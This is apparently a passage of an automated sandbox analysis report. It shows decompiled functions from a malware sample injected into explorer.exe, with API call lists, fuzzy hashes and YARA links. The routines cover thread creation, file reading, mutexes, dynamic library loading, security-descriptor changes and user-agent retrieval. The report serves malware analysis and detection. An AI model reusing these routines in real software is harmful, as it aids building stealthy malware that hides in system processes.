        • Instruction Fuzzy Hash: B451B072A0021DBBCF10DF98DC85FDEBBB8AF05324F10826AF514AB191DB75A644CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C98EE, Relevance: 3.1, APIs: 2, Instructions: 133COMMON
        Download Yara Rule
        C-Code - Quality: 94%
        			E000C98EE(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				struct _SECURITY_ATTRIBUTES* _t58;
				intOrPtr _t59;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t69;
				struct _SECURITY_ATTRIBUTES* _t73;
				intOrPtr _t74;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t79;
				intOrPtr _t82;
				intOrPtr _t83;
				void* _t86;
				intOrPtr _t87;
				intOrPtr _t89;
				signed int _t92;
				intOrPtr _t97;
				intOrPtr _t98;
				int _t106;
				intOrPtr _t110;
				signed int _t112;
				signed int _t113;
				void* _t115;

				_push(__ecx);
				_push(__ecx);
				_v8 = __edx;
				_v12 = __ecx;
				_t77 =  *0xde76c; // 0x1d0
				_t73 = 0;
				if(E000CA4BF(_t77, 0x7530) >= 0) {
					_t45 =  *0xde770; // 0x64aac0
					_t112 = 0;
					_t106 = 0;
					do {
						_t78 =  *((intOrPtr*)(_t106 + _t45));
						if(_t78 == 0) {
							L6:
							if( *((intOrPtr*)(_t106 + _t45)) == _t73) {
								_t113 = _t112 << 5;
								if(_v8 == _t73) {
									 *(_t113 + _t45 + 0x10) = _t73;
									_t46 =  *0xde770; // 0x64aac0
									 *(_t113 + _t46 + 0xc) = _t73;
									L14:
									_t79 =  *0xde770; // 0x64aac0
									 *((intOrPtr*)(_t113 + _t79 + 0x14)) = _a8;
									_t48 =  *0xde770; // 0x64aac0
									 *((intOrPtr*)(_t113 + _t48 + 8)) = _v12;
									_t49 = E000CA471(0, 1);
									_t82 =  *0xde770; // 0x64aac0
									 *((intOrPtr*)(_t113 + _t82 + 0x1c)) = _t49;
									_t83 =  *0xde770; // 0x64aac0
									_t30 = _t83 + _t113 + 4; // 0x64aac4
									_t52 = CreateThread(_t73, _t73, E000C98A6, _t83 + _t113, _t73, _t30);
									_t53 =  *0xde770; // 0x64aac0
									 *(_t113 + _t53) = _t52;
									_t54 =  *0xde770; // 0x64aac0
									_t86 =  *(_t113 + _t54);
									if(_t86 != 0) {
										SetThreadPriority(_t86, 0xffffffff);
										_t87 =  *0xde770; // 0x64aac0
										 *0xde774 =  *0xde774 + 1;
										E000CA4DB( *((intOrPtr*)(_t113 + _t87 + 0x1c)));
										_t74 =  *0xde770; // 0x64aac0
										_t73 = _t74 + _t113;
									} else {
										_t59 =  *0xde684; // 0x64f8f0
										 *((intOrPtr*)(_t59 + 0x30))( *((intOrPtr*)(_t113 + _t54 + 0x1c)));
										_t61 =  *0xde770; // 0x64aac0
										_t37 = _t61 + 0xc; // 0x64aacc
										_t91 = _t37 + _t113;
										if( *((intOrPtr*)(_t37 + _t113)) != _t73) {
											E000C861A(_t91,  *((intOrPtr*)(_t113 + _t61 + 0x10)));
											_t61 =  *0xde770; // 0x64aac0
										}
										_t92 = 8;
										memset(_t113 + _t61, 0, _t92 << 2);
									}
									L19:
									_t89 =  *0xde76c; // 0x1d0
									E000CA4DB(_t89);
									_t58 = _t73;
									L20:
									return _t58;
								}
								_t110 = _a4;
								_t65 = E000C8604(_t110);
								_t97 =  *0xde770; // 0x64aac0
								 *((intOrPtr*)(_t113 + _t97 + 0xc)) = _t65;
								_t66 =  *0xde770; // 0x64aac0
								if( *((intOrPtr*)(_t113 + _t66 + 0xc)) == _t73) {
									goto L19;
								}
								 *((intOrPtr*)(_t113 + _t66 + 0x10)) = _t110;
								_t67 =  *0xde770; // 0x64aac0
								E000C86E1( *((intOrPtr*)(_t113 + _t67 + 0xc)), _v8, _t110);
								_t115 = _t115 + 0xc;
								goto L14;
							}
							goto L7;
						}
						_t69 =  *0xde684; // 0x64f8f0
						_push(_t73);
						_push(_t78);
						if( *((intOrPtr*)(_t69 + 0x2c))() == 0x102) {
							_t45 =  *0xde770; // 0x64aac0
							goto L7;
						}
						_t98 =  *0xde770; // 0x64aac0
						E000C984A(_t106 + _t98, 0);
						_t45 =  *0xde770; // 0x64aac0
						goto L6;
						L7:
						_t106 = _t106 + 0x20;
						_t112 = _t112 + 1;
					} while (_t106 < 0x1000);
					goto L19;
				}
				_t58 = 0;
				goto L20;
			}





































        0x000c98f1
        0x000c98f2
        0x000c98f3
        0x000c98fb
        0x000c98fe
        0x000c9905
        0x000c990e
        0x000c9917
        0x000c991e
        0x000c9920
        0x000c9922
        0x000c9922
        0x000c9927
        0x000c994f
        0x000c9952
        0x000c996c
        0x000c9972
        0x000c99b2
        0x000c99b6
        0x000c99bb
        0x000c99bf
        0x000c99bf
        0x000c99cb
        0x000c99cf
        0x000c99d7
        0x000c99dd
        0x000c99e2
        0x000c99e8
        0x000c99ec
        0x000c99f4
        0x000c9a06
        0x000c9a0b
        0x000c9a10
        0x000c9a13
        0x000c9a18
        0x000c9a1d
        0x000c9a59
        0x000c9a5f
        0x000c9a65
        0x000c9a6f
        0x000c9a74
        0x000c9a7a
        0x000c9a1f
        0x000c9a23
        0x000c9a28
        0x000c9a2b
        0x000c9a30
        0x000c9a33
        0x000c9a37
        0x000c9a3e
        0x000c9a43
        0x000c9a49
        0x000c9a51
        0x000c9a52
        0x000c9a52
        0x000c9a7c
        0x000c9a7c
        0x000c9a82
        0x000c9a88
        0x000c9a8b
        0x000c9a8d
        0x000c9a8d
        0x000c9974
        0x000c9978
        0x000c997e
        0x000c9984
        0x000c9988
        0x000c9991
        0x00000000
        0x00000000
        0x000c9997
        0x000c999b
        0x000c99a8
        0x000c99ad
        0x00000000
        0x000c99ad
        0x00000000
        0x000c9952
        0x000c9929
        0x000c992e
        0x000c992f
        0x000c9938
        0x000c9965
        0x00000000
        0x000c9965
        0x000c993a
        0x000c9945
        0x000c994a
        0x00000000
        0x000c9954
        0x000c9954
        0x000c9957
        0x000c9958
        0x00000000
        0x000c9960
        0x000c9910
        0x00000000

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
        • Instruction ID: 3d3aa86b3fc97478f4b26c36f13bdb5f84f11f0de64e280aef22ffd0665b4c3f
        • Opcode Fuzzy Hash: 912f5817275a640df17d29a9f1550207a2236f237742ef2d9d25407c53b4b006
        • Instruction Fuzzy Hash: 21517271615640DFD7A9FF28EC84D6AB7F9FB48314354892EE8468B361DB34E802CB60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CA6A9, Relevance: 3.1, APIs: 2, Instructions: 90fileCOMMON
        Download Yara Rule
        C-Code - Quality: 27%
        			E000CA6A9(void* __ecx, signed int _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t29;
				intOrPtr _t34;
				intOrPtr* _t39;
				void* _t47;
				intOrPtr _t55;
				intOrPtr _t58;
				char _t60;

				_push(__ecx);
				_push(__ecx);
				_t50 = _a4;
				_t60 = 0;
				_v12 = 0;
				if(_a4 != 0) {
					_t47 = E000CA63B(_t50);
					if(_t47 == 0) {
						L11:
						_t26 = 0;
						L12:
						L13:
						return _t26;
					}
					_t27 =  *0xde684; // 0x64f8f0
					_t58 =  *((intOrPtr*)(_t27 + 0xe8))(_t47, 0);
					if(_t58 == 0) {
						L9:
						_t29 =  *0xde684; // 0x64f8f0
						 *((intOrPtr*)(_t29 + 0x30))(_t47);
						if(_t60 != 0) {
							E000C861A( &_v12, 0);
						}
						goto L11;
					}
					_t4 = _t58 + 1; // 0x1
					_t34 = E000C8604(_t4); // executed
					_t60 = _t34;
					_v12 = _t60;
					if(_t60 == 0) {
						goto L9;
					}
					_a4 = _a4 & 0;
					_push(0);
					_v8 = 0;
					_push( &_a4);
					_push(_t58);
					_push(_t60);
					while(ReadFile(_t47, ??, ??, ??, ??) != 0) {
						if(_a4 == 0) {
							if(_v8 != _t58) {
								goto L9;
							}
							_t39 = _a8;
							 *((char*)(_t58 + _t60)) = 0;
							if(_t39 != 0) {
								 *_t39 = _t58;
							}
							CloseHandle(_t47);
							_t26 = _t60;
							goto L12;
						}
						_t55 = _v8 + _a4;
						_a4 = _a4 & 0x00000000;
						_push(0);
						_push( &_a4);
						_v8 = _t55;
						_push(_t58 - _t55);
						_push(_t55 + _t60);
					}
					goto L9;
				}
				_t26 = 0;
				goto L13;
			}














        0x000ca6ac
        0x000ca6ad
        0x000ca6ae
        0x000ca6b2
        0x000ca6b4
        0x000ca6b9
        0x000ca6c9
        0x000ca6cd
        0x000ca757
        0x000ca757
        0x000ca759
        0x000ca75b
        0x000ca75d
        0x000ca75d
        0x000ca6d3
        0x000ca6e1
        0x000ca6e5
        0x000ca73d
        0x000ca73d
        0x000ca743
        0x000ca748
        0x000ca750
        0x000ca756
        0x00000000
        0x000ca748
        0x000ca6e7
        0x000ca6eb
        0x000ca6f0
        0x000ca6f2
        0x000ca6f8
        0x00000000
        0x00000000
        0x000ca6fc
        0x000ca6ff
        0x000ca700
        0x000ca706
        0x000ca707
        0x000ca708
        0x000ca72d
        0x000ca70f
        0x000ca761
        0x00000000
        0x00000000
        0x000ca763
        0x000ca766
        0x000ca76c
        0x000ca76e
        0x000ca76e
        0x000ca776
        0x000ca779
        0x00000000
        0x000ca779
        0x000ca717
        0x000ca71a
        0x000ca71e
        0x000ca720
        0x000ca723
        0x000ca728
        0x000ca72c
        0x000ca72c
        0x00000000
        0x000ca72d
        0x000ca6bb
        0x00000000

        APIs
        • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
        • CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,0064FD30,00000400), ref: 000CA776
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CloseFileHandleRead
        • String ID:
        • API String ID: 2331702139-0
        • Opcode ID: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
        • Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
        • Opcode Fuzzy Hash: 0c2e57819429ee9f58ecef23a912cd33716d10acf2d0f78d509550d80c5d2c33
        • Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C153B, Relevance: 3.1, APIs: 2, Instructions: 69synchronizationCOMMON
        Download Yara Rule
        C-Code - Quality: 76%
        			E000C153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0xde6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xde6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E000C1080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0xde6e8 = E000C91A6(_t3, 0);
							E000C85C2( &_v8);
							_t7 = E000C8604(0x100);
							 *0xde6f0 = _t7;
							if(_t7 != 0) {
								 *0xde6fc = 0;
								_t9 = E000C8604(0x401);
								 *0xde6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xde6c0; // 0x0
									if(__eflags == 0) {
										E000D15B6(E000C8202, 0xc820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E000CE1BC(0xdbd28, _t24); // executed
									 *0xde6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}










        0x000c153e
        0x000c1545
        0x000c154b
        0x000c1552
        0x000c1607
        0x000c1607
        0x000c1607
        0x000c1558
        0x000c155b
        0x000c1561
        0x000c1568
        0x00000000
        0x000c156e
        0x000c1573
        0x000c1578
        0x000c157d
        0x00000000
        0x000c1583
        0x000c158f
        0x000c1594
        0x000c159e
        0x000c15a3
        0x000c15ab
        0x000c15b9
        0x000c15bf
        0x000c15c4
        0x000c15ca
        0x000c15cc
        0x000c15d2
        0x000c15d8
        0x000c15e4
        0x000c15ea
        0x000c15eb
        0x000c15f2
        0x000c15f8
        0x000c15fd
        0x000c1602
        0x000c15ce
        0x000c15ce
        0x00000000
        0x000c15ce
        0x000c15ad
        0x000c15ad
        0x000c15af
        0x000c15af
        0x000c15af
        0x000c15ab
        0x000c157d
        0x000c1568
        0x000c160c

        APIs
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
        • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateMutex$AllocateHeap
        • String ID:
        • API String ID: 704353917-0
        • Opcode ID: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
        • Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
        • Opcode Fuzzy Hash: 96f8d544ba34d9314d33d9f5ca60ce87c2c83c4e2bceaab999b295b975b5d705
        • Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE1BC, Relevance: 3.0, APIs: 2, Instructions: 35libraryCOMMON
        Download Yara Rule
        C-Code - Quality: 47%
        			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000C95C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E000CE171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000C85C2( &_v8);
				return _t25;
			}










        0x000ce1bf
        0x000ce1c2
        0x000ce1c8
        0x000ce1ca
        0x000ce1cf
        0x000ce1d1
        0x000ce1db
        0x000ce1dc
        0x000ce1eb
        0x000ce1de
        0x000ce1de
        0x000ce1de
        0x000ce1ef
        0x000ce1f6
        0x000ce1fc
        0x000ce1fc
        0x000ce201
        0x000ce20c

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
        • LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID:
        • API String ID: 4133054770-0
        • Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
        • Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
        • Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C2C8F, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
        Download Yara Rule
        C-Code - Quality: 65%
        			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E000CB700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E000CBB8D(_t70) == 0) {
					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E000C2C64( &_v1084, __eflags);
					} else {
						E000CB012(_t54,  &_v564); // executed
						_t32 = E000C109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000C92E5( &_v1084);
						E000C85D5( &_v12);
					}
				} else {
					_t38 = E000C109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0xde684; // 0x64f8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E000C109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000C92E5( &_v564);
						E000C85D5( &_v8);
					} else {
						_t71 = E000C2C64( &_v44, _t78);
					}
					E000C85D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E000CB269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E000CB269(_t71) == 0) {
						E000C861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}























        0x000c2c9e
        0x000c2ca0
        0x000c2ca3
        0x000c2ca9
        0x000c2cb2
        0x000c2d36
        0x000c2d3b
        0x000c2d3c
        0x000c2d3e
        0x000c2d8f
        0x000c2d40
        0x000c2d46
        0x000c2d50
        0x000c2d55
        0x000c2d5a
        0x000c2d5d
        0x000c2d5e
        0x000c2d63
        0x000c2d64
        0x000c2d65
        0x000c2d6c
        0x000c2d6d
        0x000c2d7a
        0x000c2d80
        0x000c2d85
        0x000c2cb4
        0x000c2cb9
        0x000c2cbe
        0x000c2ccc
        0x000c2cd0
        0x000c2cd5
        0x000c2cdb
        0x000c2cdd
        0x000c2ced
        0x000c2cf2
        0x000c2cf7
        0x000c2cfa
        0x000c2cfb
        0x000c2d00
        0x000c2d01
        0x000c2d02
        0x000c2d0f
        0x000c2d15
        0x000c2cdf
        0x000c2ce4
        0x000c2ce4
        0x000c2d21
        0x000c2d26
        0x000c2d93
        0x000c2d96
        0x000c2d9d
        0x000c2da1
        0x000c2da9
        0x000c2dbc
        0x000c2dc1
        0x000c2dc5
        0x000c2da9
        0x000c2dca

        APIs
        • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: CreateDirectory
        • String ID:
        • API String ID: 4241100979-0
        • Opcode ID: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
        • Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
        • Opcode Fuzzy Hash: f6f7a71bb3941ac1aeffb587f55236f666260afc3c805e77b112249eb065dcac
        • Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C5AFF, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
        Download Yara Rule
        C-Code - Quality: 100%
        			E000C5AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E000C8604(0x14);
				_t38 =  *0xde688; // 0xf0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E000C2DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E000C4D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E000CA39E();
				E000CA39E();
				return _t47;
			}

















        0x000c5aff
        0x000c5aff
        0x000c5b0a
        0x000c5b0c
        0x000c5b12
        0x000c5b18
        0x000c5b22
        0x000c5b2b
        0x000c5b36
        0x000c5b41
        0x000c5b47
        0x000c5b4f
        0x000c5b4f
        0x000c5b55
        0x000c5b5b
        0x000c5b5e
        0x000c5b69
        0x000c5b71
        0x000c5b73
        0x000c5b78
        0x000c5b98
        0x000c5b9f
        0x00000000
        0x000c5ba1
        0x000c5ba1
        0x000c5ba1
        0x000c5b7a
        0x000c5b7a
        0x000c5b7c
        0x000c5b80
        0x00000000
        0x000c5b82
        0x000c5b82
        0x000c5b85
        0x000c5b8b
        0x000c5b8e
        0x00000000
        0x000c5b90
        0x00000000
        0x000c5b90
        0x00000000
        0x000c5b8e
        0x000c5b96
        0x000c5ba6
        0x000c5ba8
        0x00000000
        0x00000000
        0x00000000
        0x000c5b96
        0x000c5b80
        0x000c5bad
        0x000c5bb0
        0x000c5bb8
        0x000c5bc3

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateDriveHeapType
        • String ID:
        • API String ID: 414167704-0
        • Opcode ID: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
        • Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
        • Opcode Fuzzy Hash: a2db17aa47893aa15768880998055ed9ba17f75a9c7193572a10a195049763cf
        • Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CBC7A, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
        Download Yara Rule
        C-Code - Quality: 44%
        			E000CBC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0xde674; // 0x1e4
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000C95E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0xde68c; // 0x64fab8
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0xde68c; // 0x64fab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0xde68c; // 0x64fab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0xde68c; // 0x64fab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000C85D5( &_v24);
				return _t39;
			}















        0x000cbc81
        0x000cbc84
        0x000cbc8f
        0x000cbc92
        0x000cbc95
        0x000cbc98
        0x000cbc9b
        0x000cbca1
        0x000cbca5
        0x000cbca8
        0x000cbca9
        0x000cbcab
        0x000cbcac
        0x000cbcb9
        0x000cbcbe
        0x000cbcc2
        0x000cbcc6
        0x000cbcc7
        0x000cbccc
        0x000cbcd7
        0x000cbcd9
        0x000cbcdc
        0x000cbce1
        0x000cbce2
        0x000cbce3
        0x000cbce4
        0x000cbce6
        0x000cbce8
        0x000cbcf1
        0x000cbcf3
        0x000cbcf3
        0x000cbcf1
        0x000cbcf4
        0x000cbcfd
        0x000cbcfd
        0x000cbd04
        0x000cbd0f

        APIs
        • SetSecurityInfo.ADVAPI32(000001E4,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: InfoSecurity
        • String ID:
        • API String ID: 3528565900-0
        • Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
        • Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
        • Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
        • Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000CE450, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
        Download Yara Rule
        C-Code - Quality: 71%
        			E000CE450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0xde6b0; // 0x25807e0
				if( *_t5 == 0) {
					_v8 = E000C95C7(0x2a7);
					 *0xde788 = E000C91A6(_t6, 0);
					E000C85C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E000C8604(0x101);
					 *0xde788 = _t10;
					_t11 =  *0xde6b0; // 0x25807e0
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
					}
				}
			}








        0x000ce453
        0x000ce454
        0x000ce45c
        0x000ce4a6
        0x000ce4b3
        0x000ce4b8
        0x00000000
        0x000ce45e
        0x000ce463
        0x000ce46a
        0x000ce473
        0x000ce47a
        0x000ce481
        0x000ce485
        0x000ce4bd
        0x000ce4c0
        0x000ce487
        0x000ce499
        0x000ce499
        0x000ce485

        APIs
          • Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612
        • ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481
          • Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660
